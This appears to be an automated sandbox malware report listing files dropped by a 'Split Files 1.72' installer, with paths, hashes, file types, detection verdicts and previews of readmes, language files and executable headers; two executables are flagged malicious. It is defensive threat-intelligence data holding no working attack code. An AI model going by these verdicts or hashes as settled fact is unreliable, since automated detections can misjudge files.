Preview:	Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..

C:\Program Files (x86)\Split Files\ReadMe - RU.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with very long lines (1053), with CRLF line terminators
Category:	dropped
Size (bytes):	2942
Entropy (8bit):	5.0506474169868945
Encrypted:	false
SSDEEP:	48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
MD5:	58D65074A58BC8EAE2D5A3B589399A53
SHA1:	074E7E5BFD52200086309913670D49BA664FB279
SHA-256:	2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
SHA-512:	C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..

C:\Program Files (x86)\Split Files\SplitFiles131.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	modified
Size (bytes):	3491315
Entropy (8bit):	5.600225128146387
Encrypted:	false
SSDEEP:	24576:8kvs+hjRbEtvgIyhbpegN4X94JFlWchs9F4AyM1n6iuAdsGR0A2O3DyLaYtBlecd:8VQj5EtvSpZvJFIp9IM1ft22mHBldXXL
MD5:	361518D6CC3C25EEC2DFC1DE82B055B2
SHA1:	5B298ED47BDEFA0BB953F277649CCB7C3A308C3C
SHA-256:	616BB3AC1AE4651819FCD80CB8357940061AF64A21401C33E8C84CFF41679211
SHA-512:	4EFAC7D2D772FDD8D3DAC80CE7874D5E85957D39B8F1392E00CF8969F87076A1146363990212ED79E63ADEF92427514E3E7D957B2E3E3D056E5A6741D57FA030
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~.c.........._...............................@..........................P......]m5..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...+......+.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Split Files\is-3OAED.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with very long lines (1053), with CRLF line terminators
Category:	dropped
Size (bytes):	2942
Entropy (8bit):	5.0506474169868945
Encrypted:	false
SSDEEP:	48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
MD5:	58D65074A58BC8EAE2D5A3B589399A53
SHA1:	074E7E5BFD52200086309913670D49BA664FB279
SHA-256:	2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
SHA-512:	C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
Malicious:	false
Preview:	Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..

C:\Program Files (x86)\Split Files\is-6QN6Q.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	data
Category:	dropped
Size (bytes):	3491315
Entropy (8bit):	5.600224518949536
Encrypted:	false
SSDEEP:	24576:3kvs+hjRbEtvgIyhbpegN4X94JFlWchs9F4AyM1n6iuAdsGR0A2O3DyLaYtBlecd:3VQj5EtvSpZvJFIp9IM1ft22mHBldXXL
MD5:	F488A4815DE52F915E37E40EA88B011F
SHA1:	16F9954F5E9FE6CB50125396B7DB524218D01237
SHA-256:	E13C9E749995269A3C45C6464B2F0BF55283288FD020FE4D0F1CA811142CC2AC
SHA-512:	04262ADC77B3126FCB9A8991612DDCFC35DF7F35988D108079A0BACF04350C57E829CA8E8C74833D0A0D9D9CD1DD480B9F4FA7145051AECF85D23C85A90667E2
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~.c.........._...............................@..........................P......]m5..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...+......+.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Split Files\is-AGVDF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	789258
Entropy (8bit):	6.369988626022893
Encrypted:	false
SSDEEP:	12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
MD5:	D3BA43B9E1B3838F28AFC558F2991D5B
SHA1:	1132F1C76760281A591F7DF99D592283103FCC87
SHA-256:	1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
SHA-512:	870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
Malicious:	true
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Split Files\is-JSP8F.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	5.12302231676258
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
MD5:	DCD6923B008121BFF4C7C0AA1206286E
SHA1:	AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
SHA-256:	E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
SHA-512:	EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
Malicious:	false
Preview:	[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..

C:\Program Files (x86)\Split Files\is-UJJ0L.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2193
Entropy (8bit):	4.702648325021821
Encrypted:	false
SSDEEP:	24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
MD5:	EA42A2F0D0B4CBE042DE38568E18F1AC
SHA1:	58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
SHA-256:	AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
SHA-512:	6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
Malicious:	false
Preview:	Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..

C:\Program Files (x86)\Split Files\language\Arabic.ini (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2266
Entropy (8bit):	5.4593359267896355
Encrypted:	false
SSDEEP:	48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
MD5:	4ABA9765EB3555788F5706D87A9D2DCA
SHA1:	36C0895FBF9F99690CA55C54CC56310E24513113
SHA-256:	E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
SHA-512:	3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
Malicious:	false
Preview:	[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'

C:\Program Files (x86)\Split Files\language\Chinese.ini (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2345
Entropy (8bit):	5.847861612631974
Encrypted:	false
SSDEEP:	48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
MD5:	A5C9FEA89EFE8E2162BA477E8EA39B44
SHA1:	E6A2042C574D14786891F0C32F92C8292BBB4ACA
SHA-256:	8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
SHA-512:	3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
Malicious:	false
Preview:	[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.

C:\Program Files (x86)\Split Files\language\Dutch.ini (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2687
Entropy (8bit):	5.051567814097503
Encrypted:	false
SSDEEP:	48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
MD5:	D2471D35D833E2544D67365E015E6153
SHA1:	497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
SHA-256:	4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
SHA-512:	C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
Malicious:	false
Preview:	[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou

C:\Program Files (x86)\Split Files\language\English.ini (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2594
Entropy (8bit):	5.044497576650396
Encrypted:	false
SSDEEP:	48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
MD5:	76776746B3CFF1CBD5D56CD44CA2DEF5
SHA1:	2F2ECA50BD7F72232BE84291EF1A7956C24098CC
SHA-256:	EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
SHA-512:	202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
Malicious:	false
Preview:	[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag

C:\Program Files (x86)\Split Files\language\French.ini (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2507
Entropy (8bit):	5.040552699764577
Encrypted:	false
SSDEEP:	48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
MD5:	336D33F55222F48FBA19EF0911732766
SHA1:	E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
SHA-256:	0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
SHA-512:	67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
Malicious:	false
Preview:	[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl

C:\Program Files (x86)\Split Files\language\Italian.ini (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2729
Entropy (8bit):	5.029883215699414
Encrypted:	false
SSDEEP:	48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
MD5:	8AFE543CB6791AA250312EBA61BF7C13
SHA1:	BFD229D43BE86728A634055AD65860157C2671BD
SHA-256:	AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
SHA-512:	5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
Malicious:	false
Preview:	[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '

C:\Program Files (x86)\Split Files\language\Russian.ini (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2299
Entropy (8bit):	5.691502190790686
Encrypted:	false
SSDEEP:	48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
MD5:	F9F47FF3D866FFC4F38E315E41356E55
SHA1:	EFC313A99993B5FB8A454D4C5197C6F3965B5C89
SHA-256:	3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
SHA-512:	6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
Malicious:	false
Preview:	[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile

C:\Program Files (x86)\Split Files\language\Spanish.ini (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2718
Entropy (8bit):	5.057121428169199
Encrypted:	false
SSDEEP:	48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
MD5:	21B4D47F5D851271C89310C92777FB70
SHA1:	9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
SHA-256:	D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
SHA-512:	46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
Malicious:	false
Preview:	[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....

C:\Program Files (x86)\Split Files\language\Turkish.ini (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2607
Entropy (8bit):	5.234177949162883
Encrypted:	false
SSDEEP:	48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
MD5:	E1271E0DDD609CD7F9C2367D32FEBE4B
SHA1:	0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
SHA-256:	AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
SHA-512:	86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
Malicious:	false
Preview:	[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.

C:\Program Files (x86)\Split Files\language\is-79U67.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2718
Entropy (8bit):	5.057121428169199
Encrypted:	false
SSDEEP:	48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
MD5:	21B4D47F5D851271C89310C92777FB70
SHA1:	9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
SHA-256:	D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
SHA-512:	46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
Malicious:	false
